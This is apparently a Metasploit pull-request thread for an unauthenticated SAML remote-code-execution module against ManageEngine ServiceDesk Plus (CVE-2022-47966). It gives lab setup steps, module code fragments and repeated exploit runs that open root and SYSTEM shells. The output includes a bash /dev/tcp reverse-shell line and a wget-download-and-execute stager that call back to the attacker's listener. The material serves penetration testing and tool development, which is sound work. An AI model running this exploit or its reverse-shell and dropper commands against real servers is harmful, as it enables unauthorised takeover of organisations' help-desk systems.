ManageEngine ServiceDesk Plus RCE (CVE-2022-47966)

[cdelafuente-r7]

This exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (CVE-2020-0646). Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

Installation

SAML 2.0 Identity Provider

If you don't have an already SAML 2.0 Identity Provider (IdP), you can use this free one for testing: https://mocksaml.com/

Save the certificate to a local file (e.g. cert.cer) and take note of the SSO URL (https://mocksaml.com/api/saml/sso).

Download the installers

Go to https://archives.manageengine.com/, fill the form with any data and select ServiceDesk Plus product with any version (e.g. 14003). You can then have access to all the versions and platform installers.

Windows

1. Launch the Windows installer and select all the default options by clicking Next (you can skip the Registration for Technical Support part, it is optional). When the installation is done, select Start ServiceDesk Server and click Finish
2. Go to C:\Program Files\ManageEngine\ServiceDesk\bin\ and run SDPLaunch. This will start a browser and get you to the login page.

Linux (Ubuntu)

1. Make the installer executable executing chmod +x <linux_installer>.bin
2. Launch the Linux installer as root, select all the default options by clicking Next until you reach the installation path page.
3. Change the installation path to somewhere else than under /root/ (it doesn't work with this default path) and finish the installation. You might get an error 'Problem in initializing Postgres', just ignore it, click OK and finish the installation. We'll fix this in the next step.
4. If you got the Postgres error in the last step, go to the installation base path (e.g. '/opt/ManageEngine/ServiceDesk/') and run the following commands as root:
   • cp tools/postgres/bin/gettimezone tools/postgres/bin/gettimezone_32
   • cp tools/postgres/bin/gettimezone_64 tools/postgres/bin/gettimezone
   • cd bin
   • ./initPgsql.sh
5. Start the server running run.sh as root

Enable SAML 2.0 SSO

1, Go to http://localhost:8080

1. Select Log in as Administrator.
2. Go to http://localhost:8080/app#/admin and click on SAML Single Sign On in the ​​Users & Permission section.
3. In Configure Identity Provider Details, set the SSO URL from the IdP (e.g. https://mocksaml.com/api/saml/sso), set the Name ID Format to Unspecified, the Algorithm to RSA_SHA1 and select the SiP certificate file (e.g. cert.cer).
4. In Additional Claims > Default Fields, set the Login Name to any value.
5. Click Save
6. Enable SSO by switching the Enable SAML Single Sign-On ? button on the top of the page.

Verification Steps

1. Start msfconsole
2. Do: use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
3. Do: exploit rhosts=<remote host IP> lhost=<local host IP>
4. You should get a shell
5. Also test with other targets against Windows and Linux

Scenarios

ServiceDesk Plus versions 14003 on Windows - Target 1 (Windows Command)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 192.168.100.104
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.104:51417) at 2023-01-26 12:07:43 +0100
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

ServiceDesk Plus versions 14003 on Windows - Target 0 (Windows EXE Dropper)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 0
target => 0
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.104 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (200774 bytes) to 192.168.100.104
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.104:51435) at 2023-01-26 12:08:42 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

ServiceDesk Plus versions 14003 on Linux (Ubuntu) - Target 2 (Unix Command)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 2
target => 2
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24380 bytes) to 192.168.100.109
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.109:43062) at 2023-01-26 16:07:21 +0100
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root

ServiceDesk Plus versions 14003 on Linux (Ubuntu) - Target 2 (Unix Dropper)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 3
target => 3
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.100.109 lhost=192.168.100.1
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.100.1:8080/55oyjyc1i
[*] Client 192.168.100.109 (curl/7.68.0) requested /55oyjyc1i
[*] Sending payload to 192.168.100.109 (curl/7.68.0)
[*] Sending stage (3045348 bytes) to 192.168.100.109
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.109:40138) at 2023-01-26 16:09:37 +0100
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.100.109
OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[h00die-gr3y]

@cdelafuente-r7 Cool stuff !
Tested your module against ManageEngine ServiceDesk plus 14002 running on Windows datacenter 2019. I can confirm that both Powershell payloads and the Windows EXE dropper are working fine.
Took the opportunity to test your module also against a Linux target. ManageEngine ServiceDesk plus 14002 running on Ubuntu 22.04.

Works well with reverse_bash, reverse_netcat, python meterpreter and other python payloads with following code additions:
[-] Add additional BadChars \x20 to Linux and Unix target: 'Payload' => { 'BadChars' => "\x27\x20" },
[-] Updated below code in your execute_command

  def execute_command(cmd, _opts = {})
    case target['Type']
    when :windows_dropper
      cmd = "cmd /c #{cmd}"
    when :unix_cmd, :linux_dropper
      cmd = "bash -c #{cmd}"
    end

Linux dropper does not work yet...

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 26 opened (192.168.100.7:4444 -> 192.168.100.18:39520) at 2023-01-25 18:40:33 +0000

uname -a
Linux cuckoo 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
whoami
root

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 27 opened (192.168.100.7:4444 -> 192.168.100.18:39012) at 2023-01-25 19:00:04 +0000

uname -a
Linux cuckoo 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24380 bytes) to 192.168.100.18
[*] Meterpreter session 29 opened (192.168.100.7:4444 -> 192.168.100.18:54256) at 2023-01-25 19:04:25 +0000

meterpreter > sysinfo
Computer        : cuckoo
OS              : Linux 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root
meterpreter >

Another suggestion is maybe to add a native java payload in your XSLT
There is a nice reference on the topic and you can find it here

Looking forward to see your module landed soon !

[cdelafuente-r7]

Thanks @h00die-gr3y for looking into this! I managed to install a Linux target and added your suggestions. It works great! I had to do some updates to make it work with a Linux Dropper target.

[cdelafuente-r7]

Thanks @smcintyre-r7 ! I added randomisation to the XML in ed2dd2f. I also fixed an issue with BadChars not handled correctly by the cmdstager in the same commit.

[h00die-gr3y]

@cdelafuente-r7 Quick question for you: This module covers ManageEngine ServiceDesk Plus targets, however the SAML RCE applies to a broad range of other ManageEngine products. Today I tested most of your code base against a vulnerable ManageEngine Endpoint Central target and the RCE works beside of course your checking code.
So what would be the approach here? A separate module per product or make a more general module that covers multiple ManageEngine products with the same SAML RCE?

[cdelafuente-r7]

@h00die-gr3y, I had the exact same question! For now, I think separate modules is good enough, but we can think about another option later. Feel free to reuse this code and submit separate modules for other affected products. That would be great, actually!

BTW, I just submitted a PR for ADSelfService Plus: #17556.

[h00die-gr3y]

@cdelafuente-r7 I have some suggestions to improve your check logic.
You are now checking on the build version and the 400 http response only to determine if the target is vulnerable.
This actually creates a lot of false positives because SAML should be active or should have be configured in the past for the exploit to work. See the vendor advisory.

So have a code suggestion to improve the check. You can use the endpoint SamlRequestServlet to determine if SAML is active. It throws a 302 http redirect response with a Location header containing the SAML request.
With this response you can check that SAML is active and together with your build information determine if the target is exploitable.
Unfortunately there is no way to check if SAML has been configured in the past and is disabled, but you can provide guidance in your check logic to inform the user about this.

Here is the code suggestion, feel free to change because I am not a ruby expert.

  def check_saml_enabled
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('/SamlRequestServlet')
    })
    # Servers with SAML enabled respond with 302 and a HTTP header Location: containing the SAML request
    if res && res.code == 302 && res.headers['Location'].include?('SAMLRequest=')
      return true
    else
      return false
    end
  end

and add this after your checks on the build version.

    # check if SAML is enabled and active
    if check_saml_enabled
      CheckCode::Vulnerable("Build is #{info[:build]}")
    else
      CheckCode::Appears("SAML is not enabled, but build #{info[:build]} is still exploitable if SAML was configured in the past.")
    end

Check it out in your lab...

And one more suggestion, you might want to introduce a lower limit check on the build version.
SAML SSO got introduced in build 10511 for the on-premises version according to what I could find on the Internet.

[cdelafuente-r7]

Thanks for your suggestions @h00die-gr3y. The Vulnerable check code can only be used if the vulnerability has been actively confirmed. In this case, the build number and SAML enabled are not enough and it should be Appears check code too.

    if check_saml_enabled
      CheckCode::Appears("Build is #{info[:build]}")
    else
      CheckCode::Appears("SAML is not enabled, but build #{info[:build]} is still exploitable if SAML was configured in the past.")
    end

So, in both cases, we end up with the same check code and the execution of the exploit. The only difference is that the user know if SAML is enabled or not. He will have to run the exploit to find out if it is exploitable anyway. I'm not sure this extra information is useful for this and if it is worth sending one more request for it.

That said, I will add the minimum build number check. Thanks for the suggestion!

[h00die-gr3y]

@cdelafuente-r7 One more point, why are you referring to CVE-2020-0646 instead of referencing CVE-2022-47966?
Is it a copy error or do I miss something here?

[cdelafuente-r7]

Good catch @h00die-gr3y ! It is a bad copy/paste. Thanks for the heads up!

[bwatters-r7]

Suggested change

	1, Go to `http://localhost:8080`
	1. Go to `http://localhost:8080`

[bwatters-r7]

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met
                                              asploit
   RPORT      8080                  yes       The target port (TCP)
   SRVHOST    10.5.135.201          yes       The local host or network interface to listen on. This must be an address on the loca
                                              l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rhost 10.5.134.167
rhost => 10.5.134.167
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > check
[*] 10.5.134.167:8080 - The target appears to be vulnerable.
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Powershell command length: 4148
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (175686 bytes) to 10.5.134.167
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.167:52102) at 2023-02-03 09:18:41 -0600

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.134.167 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 0
target => 0
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.167          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met
                                              asploit
   RPORT      8080                  yes       The target port (TCP)
   SRVHOST    10.5.135.201          yes       The local host or network interface to listen on. This must be an address on the loca
                                              l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows EXE Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
<cmd stager removed>
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (200774 bytes) to 10.5.134.167
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.167:52103) at 2023-02-03 09:22:12 -0600
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bwatters-r7]

Linux Cmd:

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[+] bash -c '0<&54-;exec 54<>/dev/tcp/10.5.135.201/4444;sh <&54 >&54 2>&54'
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (10.5.135.201:4444 -> 10.5.134.129:37134) at 2023-02-06 15:41:08 -0600

ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.5.134.129  netmask 255.255.255.0  broadcast 10.5.134.255
        ether 00:0c:29:93:02:de  txqueuelen 1000  (Ethernet)
        RX packets 357364  bytes 526022072 (526.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 61456  bytes 4953132 (4.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 372621  bytes 152414081 (152.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 372621  bytes 152414081 (152.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

whoami
root

Linux Dropper

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.129          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met
                                              asploit
   RPORT      8080                  yes       The target port (TCP)
   SRVHOST    10.5.135.201          yes       The local host or network interface to listen on. This must be an address on the loca
                                              l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8989                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://10.5.135.201:8989/menXB0nb
[*] Generated command stager: ["wget -qO /tmp/EEuXCKuh http://10.5.135.201:8989/menXB0nb;chmod +x /tmp/EEuXCKuh;/tmp/EEuXCKuh;rm -f /tmp/EEuXCKuh"]
[*] Client 10.5.134.129 (Wget/1.21.2) requested /menXB0nb
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 10.5.134.129
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.129:37140) at 2023-02-06 16:22:40 -0600
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 10.5.134.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

[bwatters-r7]

Release Notes

This adds an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (GHSA-4w3v-83v8-mg94).

[gwillcox-r7]

Tagging this rn-modules since this was also missing the tag in preparation for tomorrow's release.